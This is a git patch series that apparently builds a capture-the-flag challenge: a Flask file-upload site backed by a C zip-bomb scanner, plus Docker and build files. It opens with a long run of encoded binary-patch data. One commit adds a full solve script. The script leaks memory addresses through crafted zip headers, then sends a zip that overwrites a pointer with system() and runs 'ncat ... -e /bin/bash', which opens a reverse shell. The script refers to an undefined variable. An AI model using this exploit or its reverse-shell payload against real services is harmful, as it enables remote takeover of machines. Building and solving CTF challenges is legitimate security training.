z!pFeC28k?okYS*(;DE&}C(L3lu*HgukmLd~h#L_opv1s~?0Q5*^YVfmtjG@02TEpq zNHGo$DSo(4a7e+DhyX061%(-zIk>s4z=kLafZQh}1~*la8DzUK)C{l#L8-x07!+Wz z@DpJLt4DIZC?u7MfrAZdvZpXFcQ!WzgE%OPBv?V|9&8>rB&a1JVF9vV3Nw{SLz0#Z zG*CgqtB3$%V30$O2S}=s2c;SX)KsG=j*^I!z@Z1tqYMnnyx^>%0-``csR~P=YEbWk zRl>4@I$RJOu8{np0T+a3D@ZU^fu^`IO9XgYVMca7DE3((g#{}{vS5P-03QPbJ4O(4 zAc6!GYp^l`*_R-Hal_If4=f$>VniTjGJ-@8Qpo_0ZctK$_z{wo1YyZa2om)ipyGoE z7WJ@n1Pw@7S`-1L2vKOzfzt#ijUgK=h9b#|u(b-DfyE)oO#+;h74@tX!PbJ)vLqxe zg9X58Sqf$pDAOpi!Q3DX6^0flFkuByB-#g%utsQjih}R&;P%gWU>=32~?& z;DQVc5(ptkiwI&q#1L?+1Qs!{5(H`)BJnUVNJD}Rl!_P_F#?SaC#24;--VL{DQ ztdKZnM#M3qJqT$|AlibEbOLJ&g5w1}!E<9IA|80`^J2ypAJnCwVHZex7eK8^1<^wb z60V562u|UUAcRDbFsRmHU|>)KjaV>nFsuX>U5t#s`FI&X2l|3|3?P;~Cur;xv@!xT z$uXIMfng7H?DsRc=fc3C3F`1L$}{ncf(D@(!9*}fEE+^)f%-`xE(>_bssem6J(DoRuSjmA&OT zs~E>RRxXZoR?Y=XDk7}x3pwsQ<@n4h#Sz8I!_mabp8kxZnPc6_C9JH>fhU+)85kM+ zz&&ja22f9t5nD*Hg9gGt`>{Zw1PU$CxB@72Kq18h3L#$5ustJ$00jgnT$n*&zyb;b z7ElLsmsER!uKfnNO^G zHmpL{tbF#Y95$?)3`{JHUaT@8%7&HChn0(giG`_*RTV@rm#48xfn>Z`ML|>vD;G0Q z1S_MhA*=2lRuL~&1sf2_ah;XN2V{wK6sx)ytG*X2*C$rpQdar3toEx}P4rpyOIU?; zS;aD0<-Az6ITTopy;#+ruyW|J@<*|mS%I#tmZDQqVWd+69Bvwt1 zW>$watk!E-xg%IbZCQEKSf$poicVnF&tO$dV--KaD%{M<)x^pPazGS_U{Vod6^mlk zea6b3#wx1E%HG5($l<`s+r-MgfK`*D1!0^l*f_CutSTI9S-ClcSXJ#=xk^|$TUaG` zvx;*Fu_~mq@^c8W%6NmURa0Q)Nn_>qVHE;7)^H)KavH1T30Bc&R-PtSZjj9o>(xY9 zC8Ai}pR;nNvMTC>;!iGuRm6ssvyoNnJ1c()t4s^4_yktN4EzRgK4aD5XalL|^kLGF zU}b005N8!&QjuWgNMjXfV`VR4m5E|iZDJMTcmlGVErQholmOV8S%nywSXek7v+{yy zdsY`o&IbN&+%)Hk?q0bk^D%%7KK1jm) zUl#$3ZE!S~urf2ZGD6}xl4CN54J+?cR(6gkRyHPAAy(EhRvu6|u`h)3eL#E>R`zmK zK36#_BgooFwkJ&742+DRWgDyv91NgSJbHLP+^Sb1AO=@gu6BUr^jer{sri)H1k z2PIhcC9DF>SrM$fC9JI5S=pJzY*-mp4Z$`wfn$y_f>jQpM+8LKu(JAqf|q9@t9S`0 znnWU4Ic-=uT3C5@gYp_EvY8E7*%+8um`hmsK~xi~Fo@a(P7lob5VzOL~s|Y zJcwt*Dhr|vSWQ4w6RSRi0t@Q1g6wB*ga~GU^Br>&L?v^j7sRbzFt>seN(3t-GiQV^ zB!LKV2(z+th_G^&vT{VRicVq`-USLqk;UK)DB{D)#qorda}tx92&>paRsjw>P(s%N zIlus%P?;xy%QfZ_2=4?q(K6eB%Rpv*h&SB9f{b3Q!pu2Mtm+(3Secn+PH;rBGIB(6 zeOBXAR{l?{>>NU@Vz#Vu91&m%Qx1KYsDv%60!JEHl(U(Y*^3oI zGBz_YGcYpNLn}MbDpaglixpPcfhssqg$J+XI6*_wj9>y(p)rB74-+VJF@tgr3n=HX zfHD$`J!k+NoQGgjWm2rn9O)oGvrS-CWMk40VddfQWmQRMm6*rMeS%fRmQ{kI3B(ex zW#!`#VrBO!EoJ2_&14mcVrBotDpktLdySPVgH2C13||M6e>efFlCp1da%h8$jukDG6e(7sS?1 zh#NR;AlyiZBRFipxtxi)Gy)b1%*=edz`^Zp2rY*|bq})vI8>RvSoJ_*wu_Y&M0v4- z+6>Gb>EK{s_F~lqiNYm8F~kh1w3xjhI(C5+tOa|Wc^0go0hcf~tc+E@tn6Pv34qN8 zaeG!l4m(yJ8&+l;R^BL9Wey=$*)&!zFIGM~R@M?$9s^ckFIKT#pjsbP z3o=H4oyh3LY6yyahw&vPyWdO7DV1P$8@u1Q+5q;4+7)09n4DE9W&N^!Q~V)2RH$-apFAD zX^GK`m8%160sC4|4Z&u}%Hs~sTegO*JRFLw%oA9p4L}jbY6FTOHZM@#C;_!(B3RWx z6k8Fv3S;tOWzJ${m2C@nL0O%PLdC%D4brGP;8f zE@0qb0Iglc8ZGdW5mYLIN=HQ0fNoo31QVe0kO|buVFs6n;8GAaA;T=o$gzu+^Es=) zJXWT8kP0~xQXz9hfKw1NBvUf40k^H0KYsOp%aK0yWe?4HBja;AG1*0UU@- zdSG2lAX!i_GwHEfg2H(Ms~Lm>7fgEKW+u~daBMP`u(F)~3<0d1UqD_2M|mXJI%Wf;mOjKr)5b_Fv>3B=1bkR}PFsAFyh7t+j3%0dufCM6+AG0+V1=5ADi!xojl zn^g=Xz+A>*!zutuDJ9IjCpgw3Ls05~)W3XdSp{~lg#cE@wf3x>9ObM`C7{N;z&uvP z5>{y&RK}8H- zB&*N_R?hjX{Q9iI6IglXvhuZ|i^ybv>T2GnAd-(mg;k^plok0RSVh;e3N*2bPGps9 zVioWrlOa8kmC1{h^99ID;3ixos|F}=O2Cx>^BPD#Oaps>c^)L)c%vx+^)Q*eAS#<6 zDoY?L^+%>kP_@I%T%iXJ3r0}1bIoI7VPIs8kIzp_i!Wg)&d4t+Q2?D`6z}ODUzD1d z5?@eK#E=WVLWm(gIU_MMk0CKRIkljKp*TM|JGF!%9;^qnzAQN>zc`hlI5{ydz9_Z0 zG^d0CWJpqJT6|JsaVkT6d~s%aMq*w{PHItn2}7{Ivv<6ozn_zjzq2<(PJUjx0+=X8 zI%l3CGcP_dB?Y8BIVUqUuLR6XEiOh<4{~gAMxv3aS$t_hN@7VW1K8Q18v_{PK{u1+ z<%8V;7ER4dVJJ>5DoZVbn^ar^(i5MSlbBu%awAA%Ji_T99r4MfMe)h`IiE}b;XHgsgSf#1i2x= zf*~GsqXq*c^o z#)IR@(;sXeH2Ofd2|+yJ;_Ms%)(*N}hoLwz9%@WH#HZkR2dCzE(0xA)Ntq>J!=3W; za~R<1F*zf#hyj`m!P4;snJMul3>hW)c{yORm?6Fl9AU78kXn&h!Vv7?2uhsJArTPA z1UNc-yM{1;Zc|9ifu%-}flx1J=4F;Z(sxRJX;Ka(J%dtaesXqBY97dQ;J7q2i!Xt> z2b34nQWzk&pD=)PvzZAbA_59z zQfXdkacYVYLvcw;Y7sPXIQ#g!Mz}gNq*jy^CB}p9jEIL^`xFn#7RBHq0-OlIncc-b z$k7)r7N41itPggL3REX3Vv`b+vr7vg38pwRy%-i&P|p@8#)FapB3Xh`8YGB=9K*p0 zt~@g(6`~02fMC}^XyE69$}x}~ki-KHoy@#=Q1XZ`VSwIp#E_B-%53paZZSi0QL?cS zLvl(6q+ChNO@(@wAt$l81eAE=OEPm)8LBc1Ao&ZFVHgr~GSl9Gwskfs2K*)S}|d{5*!d(%huf zqWJu@c<6;b49PjEiFpjkrA0-cN&(6Hplf~L;vn;2;gXV?mXlbL8lRDxn37rqzECC} z6r7Oo24{P4%>{KBIEITEa?^NTMvlV(lPfBW9 zVrfnZ*mTHkJvo^OR~0jW%>rHg!vL}$Y<@9ANfB5*Lr!X98Prdp=!1qB#3HCOT|AsU z7&7xpu!jc7Opu=#z}XSvv6PJD449umNdX@CMrck3y9$&OK?fXw^CwhW3Z$4x$t=!} zhlX`=Nn%k6s4ju#;9>@Fl?hHI4Ds=a#l@*bCGlyAnK=yc@c}`uAt90RZlQk8A)fwz z@$pcL!4^VmO9pU30j`E1CLv#v!~jmF(7*yEzWB_%B>#b1+{UYl~qYmVqS4teo-z1)=QocH$1^v zDSFA+)q-ztLR=7qT@lruS6HrfXjn$Q&Q7F3~-wT$^g}~dKnCvU=^9^d5Jk7iISqyp^tu17_P*Gu8E;p2aFMV#QddKL!IJ}ZzM zbiX5mFarYvHuZAg!;1wN7Jw9hG(a&(9}|NB!v!>PW2kxo5vW2a;}t#_A4_oh%tPC?Lq*HGBAMlHG<5ComUPOW&myTVPp_xc!8!Kw0|6%`?rAY6=G0; zp7aT`_ykNGw0N6=fdRDc8)OG)J1ZlD5CiNCPuSL=2T=8}13ST6Qy3T+K(!>`cY4?F1! z-Tkm*tMJHray{R%kT4?AWG=6=vVNPOWBI|~Ed{SKgA@mRtic7_1D`(XzLpt~P- zIsnZ53ZM<5SkgZ%JYjoOVeSFl{RWB`*hVUDP^2(0Fa!}W2ev&3W==L}r3Qll18n3R zw)X>OK5VNA_+T3b1_sd1OKjl=TIT_B4{YZF%zRLG!=`>ZXh#l%2!lij)Zs`JHuaz- z`-}|Y4Cv>X&McsOf#AbfptF<(nIsut_a4B+-is5!9dD%k#^Sx|BG{ozZ&;xJbr=pA5j0S5F#E-paD(GPEX02N0+N$)dQ9APeu z#RfX9f3rJfyD(F(03|lLdDT{cNas&(N9C^1dAgX3}wy% ziwiKIZ>-(|6-Te{_JYNsnvtk;IK&^aGBAMBA$s_{WyPLu+1ViF4{Sjd?9dGXsCcy* z#8TKEJXtmd2Iz?;5D6%`8ypjB0eoMFEc)|s3@@# zJT_O!kX8g57ELM5&8=jJk4NIggNMkFmBKr`pdkV17>5OD7z^uIGI+EF+-n671c8Qd zpraj-v0?b626DGcFB!Gd3+b&Pt3bbL8p}|Oo&l;M$lWc_*cynhmy@5In3I^3nOKaf z7}{4(X2@oUk9P}l^mUDQ^>c}jXNY%+^mFv}bY_T;clQg8clChEdbk8J#Jl_WJ30Eq z`@6XXyN1MvI6C>b#>1~w291w7xchiIIma968R?la6qJ^LMukwsK#CxPYw__pnMuj< z;Nhrv(7-obov{f+yl04SJR(Je_&S5qLkMWr3ERLm$h*+tE!dzQI1)fkD2AI0auYbV zK_LU~n1Tn9K;w1ssh}}X=%5)QA|bFbEFjta|=-9A+t@WLa=EE=u{qxWPE&j zZhjubJWyhdPbtoihfLl=W_Uqi2XaS2C0w5&C^`AZ7nh`D=EZ|1i(vjh3=-ynra&N( z4VhDhYX(IXG@wAkUholE(C|0^9JxA&QPP z@EjG2P<(uduQRM10p(y=iH?$gK}iWbCJ#+okh#?O_~eR2P}WM!$*f96F&5+oXkGw2 z3^a@kp3Oy31(^Uu6#@@Lq6jhQ6<6k#BqlNF6_*r2=nNPOJT_mzpqH0llB$=USE^S~ zlwXiqR8ol~1P*Q8%oM1Qqm!pDs2&3=2TxS%rBvn>SLQN+>5?J_uncU*2$>UK#GqG{ znv)1p2xS%IlrZRlf`>t`Ag4qxJ--CPC{9gg&?`x;C}Ge8Rcs7;Mfu?3N-s47T9sv_ z6fwYg5HldvA4CU?ol=>Xn46i*pa;>OR9wuU2b~mQ&`U{8Dou}1EK1BvPc4RVGxO5& zVeG`Dq@vU^7%wL?FBQfv26+^sA0!+P;v+Q_$Yg@<*#mXWL06iCjF14W(PLm>fYHz+ zkwH>m3{nebKnYO4mK{7c2N3|BpATZeXy`#BAR#b@wO_y-1_lODa|&612Go8S4Lc$O zrXJS*hw(i@htnY04;z1k(dd17bp4JMF#BQm6~buP{e&R3APh1CM8j|)=*%=E z_rvb{gVE573>aYUhuH(8K}R(FL(&hsPY_0fPA&o2h3{Hj~_F@;}_PSgwfBT<4<7Cpv#b83@8mc2?S&X%>A(O9vBU~rxU6i zG@Jlqg6X4B`(g3V0PUy4X+E$rIDsA>;2Uv}@(%-Sd=N^5#y8=bp=kw~e;dty2heRF z3=9k~`VLxz!_p7TjHjT(|3D{0K?Pvr|1Ur%rGrjzfr`T@n0^@j5p-}Nl785H!v`Yu z{{@{~j-($pZu$eNA2hBBvKy5DKs3x=SUOk@^*^W#0m;MeCw&nI;xRCQ4xE9oAS6sb zj0T-|28w@}e)#xi0z^Hm{Dbf?y0Z+RGi5+#!SuuWsRmH}Fn7ZAqsPA>c>I@v0o@*$ ze&~sFFzvA6YB&wLJqqN0xB@668frgiydEk9rqI=bmPVtCffQDQ3U&qthDo4}ryv0+ zMptVJbw5-ZPVqty0+fUe_(NsT^*iIxuLin4kAZ=q23j6KwZr`l@+`-)Bfms1cGpe61Q7KB9C4*+NF BY9Rms literal 0 HcmV?d00001 diff --git a/flag.txt b/flag.txt new file mode 100644 index 0000000..b1cd7ba --- /dev/null +++ b/flag.txt @@ -0,0 +1 @@ +THCon{Coucou} \ No newline at end of file diff --git a/CMakeLists.txt b/src/mineziper/CMakeLists.txt similarity index 100% rename from CMakeLists.txt rename to src/mineziper/CMakeLists.txt diff --git a/src/mineziper/README.md b/src/mineziper/README.md new file mode 100644 index 0000000..8b01e2c --- /dev/null +++ b/src/mineziper/README.md @@ -0,0 +1,4 @@ +# mineziper 💣 +### A Minesweeper for zip files! + +Detect zip bombs based on overlapping files. diff --git a/libmineziper/CMakeLists.txt b/src/mineziper/libmineziper/CMakeLists.txt similarity index 100% rename from libmineziper/CMakeLists.txt rename to src/mineziper/libmineziper/CMakeLists.txt diff --git a/libmineziper/include/libmineziper.h b/src/mineziper/libmineziper/include/libmineziper.h similarity index 100% rename from libmineziper/include/libmineziper.h rename to src/mineziper/libmineziper/include/libmineziper.h diff --git a/libmineziper/include/libmineziper_bitstream.h b/src/mineziper/libmineziper/include/libmineziper_bitstream.h similarity index 100% rename from libmineziper/include/libmineziper_bitstream.h rename to src/mineziper/libmineziper/include/libmineziper_bitstream.h diff --git a/libmineziper/include/libmineziper_crypto.h b/src/mineziper/libmineziper/include/libmineziper_crypto.h similarity index 100% rename from libmineziper/include/libmineziper_crypto.h rename to src/mineziper/libmineziper/include/libmineziper_crypto.h diff --git a/libmineziper/include/libmineziper_huffman_tree.h b/src/mineziper/libmineziper/include/libmineziper_huffman_tree.h similarity index 100% rename from libmineziper/include/libmineziper_huffman_tree.h rename to src/mineziper/libmineziper/include/libmineziper_huffman_tree.h diff --git a/libmineziper/include/libmineziper_zip.h b/src/mineziper/libmineziper/include/libmineziper_zip.h similarity index 100% rename from libmineziper/include/libmineziper_zip.h rename to src/mineziper/libmineziper/include/libmineziper_zip.h diff --git a/libmineziper/src/libmineziper.c b/src/mineziper/libmineziper/src/libmineziper.c similarity index 100% rename from libmineziper/src/libmineziper.c rename to src/mineziper/libmineziper/src/libmineziper.c diff --git a/libmineziper/src/libmineziper_bitstream.c b/src/mineziper/libmineziper/src/libmineziper_bitstream.c similarity index 100% rename from libmineziper/src/libmineziper_bitstream.c rename to src/mineziper/libmineziper/src/libmineziper_bitstream.c diff --git a/libmineziper/src/libmineziper_crypto.c b/src/mineziper/libmineziper/src/libmineziper_crypto.c similarity index 100% rename from libmineziper/src/libmineziper_crypto.c rename to src/mineziper/libmineziper/src/libmineziper_crypto.c diff --git a/libmineziper/src/libmineziper_huffman_tree.c b/src/mineziper/libmineziper/src/libmineziper_huffman_tree.c similarity index 100% rename from libmineziper/src/libmineziper_huffman_tree.c rename to src/mineziper/libmineziper/src/libmineziper_huffman_tree.c diff --git a/libmineziper/src/libmineziper_zip.c b/src/mineziper/libmineziper/src/libmineziper_zip.c similarity index 100% rename from libmineziper/src/libmineziper_zip.c rename to src/mineziper/libmineziper/src/libmineziper_zip.c diff --git a/mineziper/CMakeLists.txt b/src/mineziper/mineziper/CMakeLists.txt similarity index 100% rename from mineziper/CMakeLists.txt rename to src/mineziper/mineziper/CMakeLists.txt diff --git a/mineziper/mineziper.c b/src/mineziper/mineziper/mineziper.c similarity index 100% rename from mineziper/mineziper.c rename to src/mineziper/mineziper/mineziper.c diff --git a/mineziper/mineziperd.c b/src/mineziper/mineziper/mineziperd.c similarity index 100% rename from mineziper/mineziperd.c rename to src/mineziper/mineziper/mineziperd.c diff --git a/tests/CMakeLists.txt b/src/mineziper/tests/CMakeLists.txt similarity index 100% rename from tests/CMakeLists.txt rename to src/mineziper/tests/CMakeLists.txt diff --git a/tests/test_decode_fixed_tree.c b/src/mineziper/tests/test_decode_fixed_tree.c similarity index 100% rename from tests/test_decode_fixed_tree.c rename to src/mineziper/tests/test_decode_fixed_tree.c diff --git a/tests/test_decode_huffman_tree.c b/src/mineziper/tests/test_decode_huffman_tree.c similarity index 100% rename from tests/test_decode_huffman_tree.c rename to src/mineziper/tests/test_decode_huffman_tree.c diff --git a/tests/test_get_cdh.c b/src/mineziper/tests/test_get_cdh.c similarity index 100% rename from tests/test_get_cdh.c rename to src/mineziper/tests/test_get_cdh.c diff --git a/webapp/app.py b/src/webapp/app.py similarity index 100% rename from webapp/app.py rename to src/webapp/app.py diff --git a/webapp/static/space.jpg b/src/webapp/static/space.jpg similarity index 100% rename from webapp/static/space.jpg rename to src/webapp/static/space.jpg diff --git a/webapp/static/styles.css b/src/webapp/static/styles.css similarity index 100% rename from webapp/static/styles.css rename to src/webapp/static/styles.css diff --git a/webapp/templates/index.html b/src/webapp/templates/index.html similarity index 100% rename from webapp/templates/index.html rename to src/webapp/templates/index.html From 00bf8c434958520b6d917e057c083746e8ceeeb8 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:18:31 +0100 Subject: [PATCH 02/10] Add requirements.txt --- src/webapp/app.py | 2 +- src/webapp/requirements.txt | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) create mode 100644 src/webapp/requirements.txt diff --git a/src/webapp/app.py b/src/webapp/app.py index 5ae934b..829ba31 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -56,4 +56,4 @@ def upload(): return message if __name__ == '__main__': - app.run(debug=True) + app.run(debug=False) diff --git a/src/webapp/requirements.txt b/src/webapp/requirements.txt new file mode 100644 index 0000000..6b95995 --- /dev/null +++ b/src/webapp/requirements.txt @@ -0,0 +1,7 @@ +blinker==1.7.0 +click==8.1.7 +Flask==3.0.2 +itsdangerous==2.1.2 +Jinja2==3.1.3 +MarkupSafe==2.1.5 +Werkzeug==3.0.1 From bed22b2bf53a97434396370f6b7add6b67d13d26 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:18:37 +0100 Subject: [PATCH 03/10] Add build script --- build.sh | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 build.sh diff --git a/build.sh b/build.sh new file mode 100644 index 0000000..865e125 --- /dev/null +++ b/build.sh @@ -0,0 +1,13 @@ +echo "Building project and update sources in dist/" + +cd src/mineziper/ +mkdir build +cd build +cmake .. && make +cp bin/mineziperd ../../../dist +cd .. +rm -rf build +cd ../.. + +echo "Adding source backup to dist/" +zip -r dist/src.zip src \ No newline at end of file From 11c94b739dc99cd127f31434204280f80dc43750 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:21:01 +0100 Subject: [PATCH 04/10] Add missing import --- src/mineziper/libmineziper/src/libmineziper_bitstream.c | 1 + 1 file changed, 1 insertion(+) diff --git a/src/mineziper/libmineziper/src/libmineziper_bitstream.c b/src/mineziper/libmineziper/src/libmineziper_bitstream.c index 3cab8cb..d25b279 100644 --- a/src/mineziper/libmineziper/src/libmineziper_bitstream.c +++ b/src/mineziper/libmineziper/src/libmineziper_bitstream.c @@ -1,6 +1,7 @@ #include "libmineziper_bitstream.h" #include +#include unsigned int get_bits(bitstream* bs, unsigned int bit_num) { From 4c2d51b4c63c2de9fd8732fa00ba2d9d6e0e7873 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 11:21:22 +0100 Subject: [PATCH 05/10] Add full solve --- solve/solve.py | 134 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 134 insertions(+) create mode 100644 solve/solve.py diff --git a/solve/solve.py b/solve/solve.py new file mode 100644 index 0000000..01a091c --- /dev/null +++ b/solve/solve.py @@ -0,0 +1,134 @@ +import requests +import struct +import zipfile + + +############## +# PARAMETERS # +############## + +# Victim params +ip = "127.0.0.1" +port = 5000 +url = f"http://{ip}:{port}/upload" + +# Reverse shell params +ip = "127.0.0.1" +my_port = 9001 + + +############# +# LEAK ASLR # +############# + +guess = 0 +leak = b"" + +size_chunk = 0x20 +off_data = size_chunk * 2 + +stored_block_lfh = b'PK\x03\x04\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x1c\x00dummyUT\t\x00\x03\x8cb\xdee\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x009\t\xb4\x13' +stored_block_cd = b'PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00\xd2\xbb[X\xday\xa1\xa7\x04\x00\x00\x00\x04\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x00\x00\x00\x00dummyUT\x05\x00\x03\x8cb\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00' + +cd = b"PK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00C\x8a[X\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00%b\x18\x00%b\x00\x00\x00\x00\x00\x00\xa4\x81%blinpeas.shUT\x05\x00\x03>\x0b\xdeeux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00" +eocd = b"PK\x05\x06\x00\x00\x00\x00\x80\x00%b%b%b\x00\x00" + +lencd = len(cd % (b"00", b"00", b"0000")) +leneocd = len(eocd % (b"00", b'0000', b'0000')) + +totsize = len(stored_block_lfh) +totsize += len(stored_block_cd) +totsize += lencd +totsize += leneocd +totsize += 8 # metadata of heap chunk +while totsize & 0xf != 0: + totsize += 1 + +off_data += totsize # offset to the beg of "data" +off_data -= 0x18 # ajust to the beg of data.filename + +print(f"{hex(size_chunk)=}\n{hex(off_data)=}") + +for _ in range(8): + off_data += 1 + + for guess in range(0x100): + # Add a classical stored block to put the free address on the heap + zip = stored_block_lfh + zip += stored_block_cd + + # generate payload for the size and inject malicious cdh + payload = (guess << 8) + if len(leak): + payload += leak[0] + + comp = (0x1000a - payload) % 0x10000 + zip += cd % (struct.pack("H", payload), struct.pack("H", comp), struct.pack("I", off_data)) + + # Add EOCD + zip += eocd % ( + struct.pack("H", 2), + struct.pack("I", lencd + len(stored_block_cd)), + struct.pack("I", len(stored_block_lfh)) + ) + + x = requests.post(url, files={'file': zip}) + if "Error" not in x.text: + print("Found correct guess:", hex(guess)) + leak = guess.to_bytes(1, "big") + leak + + print(leak) + +leak_i = 0 +for i in range(8): + leak_i += leak[7-i] << (i*8) + +print(hex(leak_i)) + + +####################### +# Craft malicious zip # +####################### + +l = 96 +offset = -0x54670 +free = leak_i + +system = struct.pack("Q", free + offset) +command = b"ncat %b %b -e /bin/bash\x00" % (my_ip.encode(), str(my_port).encode()) + +payload = command + b"a" * (l - len(command)) + b"\x00"*4 + system + +with zipfile.ZipFile("payload.zip", "w", zipfile.ZIP_DEFLATED) as zipf: + with zipf.open("payload.txt", "w") as f: + f.write(payload) + f.close() + + for i in range(1, 8): + with zipf.open(f"dummy{str(i)}.txt", "w") as f: + f.write(b"dummy") + f.close() + + zipf.close() + +zip = b"" +with open("payload.zip", "rb") as zipf: + zip = zipf.read() + zipf.close() + +off = zip.find(bytes([len(payload)])) +print("Offset of payload size: " + hex(off)) + +zip = zip[:off] + b"\x24" + zip[off+1:] + +with open("payload.zip", "wb") as zipf: + zipf.write(zip) + zipf.close() + +print("payload.zip patched") +print("You can start listening on port ", str(my_port)) +input("Press any key when you are ready...") +print("Sending payload...") + +x = requests.post(url, files={'file': zip}) +print(x.text) \ No newline at end of file From a5899768f7f63db860b02e3a8e92931727ea3fa3 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 12:46:58 +0100 Subject: [PATCH 06/10] Update dockerfile --- Dockerfile | 12 +++++++----- README.md | 8 ++++++++ 2 files changed, 15 insertions(+), 5 deletions(-) diff --git a/Dockerfile b/Dockerfile index 06d79ba..ddea988 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,20 +1,22 @@ FROM ubuntu:22.04 -RUN apt-get update +RUN apt update && apt install python3-pip ncat -y RUN useradd -m -s /bin/bash user -USER user +# USER user WORKDIR /home/user COPY dist/mineziperd . -COPY webapp . +COPY src/webapp webapp COPY flag.txt . RUN ./mineziperd & WORKDIR /home/user/webapp + RUN pip install -r requirements.txt -ENTRYPOINT [ "python3" ] -CMD [ "app.py" ] +EXPOSE 5000 +ENV FLASK_APP=app.py +CMD ["flask", "run", "--host", "0.0.0.0"] diff --git a/README.md b/README.md index e69de29..02ea339 100644 --- a/README.md +++ b/README.md @@ -0,0 +1,8 @@ +# SpaceDrive + +## Deploy chall + +```bash +sudo docker build -t chall . +sudo docker run --rm -p 5000:5000 -it chall +``` \ No newline at end of file From 1aa057348250c8b7c292679373a9d411f7d47eab Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 12:47:17 +0100 Subject: [PATCH 07/10] Improve webapp style --- src/webapp/app.py | 12 ++- src/webapp/static/styles.css | 97 ++++++++++++++++++++----- src/webapp/templates/index.html | 34 +++++---- src/webapp/templates/upload_status.html | 17 +++++ 4 files changed, 123 insertions(+), 37 deletions(-) create mode 100644 src/webapp/templates/upload_status.html diff --git a/src/webapp/app.py b/src/webapp/app.py index 829ba31..056b788 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -17,10 +17,11 @@ def index(): @app.route('/upload', methods=['POST']) def upload(): if 'file' not in request.files: - return 'No file part' + return render_template('upload_status.html', message='No file part', success=False) + file = request.files['file'] if file.filename == '': - return 'No selected file' + return render_template('upload_status.html', message='No selected file', success=False) buf = file.read() hash = hashlib.sha256(buf).digest() @@ -44,16 +45,19 @@ def upload(): elif (status == 1): message = "Error: Potential virus found, cannot upload." + success = False else: message = 'File successfully uploaded' files.append({'filename': file.filename, 'content':buf}) + success = True except: message = 'Error: Failed to scan file' + success = False s.close() - return message + return render_template('upload_status.html', message=message, success=success) if __name__ == '__main__': - app.run(debug=False) + app.run(debug=True) diff --git a/src/webapp/static/styles.css b/src/webapp/static/styles.css index dc38ef5..bfad1c0 100644 --- a/src/webapp/static/styles.css +++ b/src/webapp/static/styles.css @@ -26,33 +26,54 @@ form { text-align: center; } + + + + + + +/* Hide the default file input button */ input[type="file"] { - margin-bottom: 20px; /* Adjust margin-bottom to create space below the input */ - margin-top: 20px; /* Add margin-top to create space above the input */ - padding: 10px; - border: 2px solid #ddd; + display: none; +} + +/* Style the custom file input button */ +.custom-file-upload { + border: 2px solid #00BFFF; border-radius: 5px; - width: 80%; - display: block; - margin: 0 auto; - background-color: #1a1a33; - color: #ffffff; + padding: 10px 20px; + background-color: transparent; + color: #00BFFF; + font-size: 16px; + cursor: pointer; + transition: background-color 0.3s, border-color 0.3s, color 0.3s; + margin-right: 10px; } -input[type="file"]::placeholder { - color: #ffffff; +.custom-file-upload:hover { + background-color: #00BFFF; + /* Light blue background on hover */ + color: #FFFFFF; + /* White text color on hover */ } +.custom-file-upload:focus { + outline: none; + /* Remove default focus outline */ + border-color: #1E90FF; + /* Darker blue border color on focus */ +} input[type="submit"] { + border: 2px solid #00BFFF; + border-radius: 5px; + padding: 10px 20px; background-color: #00ccff; color: #ffffff; - padding: 10px 20px; - border: none; - border-radius: 5px; cursor: pointer; font-size: 16px; transition: background-color 0.3s; + margin-left: 10px; } input[type="submit"]:hover { @@ -70,9 +91,51 @@ input[type="submit"]:hover { } .note { - font-size: 14px; - color: #666; - margin-top: 10px; + font-size: 16px; + color: #FFFFFF; + /* White color for visibility */ + margin-top: 20px; text-align: center; font-style: italic; + border: 2px solid #FFFFFF; + /* White border */ + padding: 10px; + border-radius: 5px; + background-color: rgba(0, 0, 0, 0.5); + /* Semi-transparent black background */ + box-shadow: 0px 0px 10px rgba(255, 255, 255, 0.2); + /* Add shadow for depth */ +} + +.success { + background-color: #c9e6c9; + color: #008000; + border: 1px solid #4caf50; +} + +.error { + background-color: #f8d7da; + color: #721c24; + border: 1px solid #f5c6cb; +} + +/* CSS for "go back to home page" link */ +.back-link { + display: inline-block; + margin-top: 20px; + text-decoration: none; + padding: 10px 20px; + background-color: #007bff; + /* Blue background color */ + color: #fff; + /* White text color */ + border-radius: 5px; + transition: background-color 0.3s, color 0.3s; +} + +.back-link:hover { + background-color: #0056b3; + /* Darker blue background color on hover */ + color: #fff; + /* White text color on hover */ } \ No newline at end of file diff --git a/src/webapp/templates/index.html b/src/webapp/templates/index.html index 290eef4..4ff4374 100644 --- a/src/webapp/templates/index.html +++ b/src/webapp/templates/index.html @@ -11,25 +11,27 @@
-

Satellite File Upload

-

Welcome to the Satellite File Upload portal. This portal allows you to securely upload files to our satellite +

SpaceDrive 🛰️

+

Welcome to the SpaceDrive portal. This service allows you to securely upload files to our satellite systems orbiting Earth.

-

Our satellites are equipped with advanced sensors and instruments that collect various types of data, - including weather patterns, environmental changes, and astronomical observations. To ensure the smooth - operation of these satellites, it's essential to regularly upload firmware updates, configuration files, and - scientific data.

-

Using this portal, you can securely transmit files to our satellites from anywhere on Earth. Once uploaded, - our satellite communication systems will process and integrate the data seamlessly into our satellite - networks.

-
- - -

Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a - specific tool to scan zip files.

+

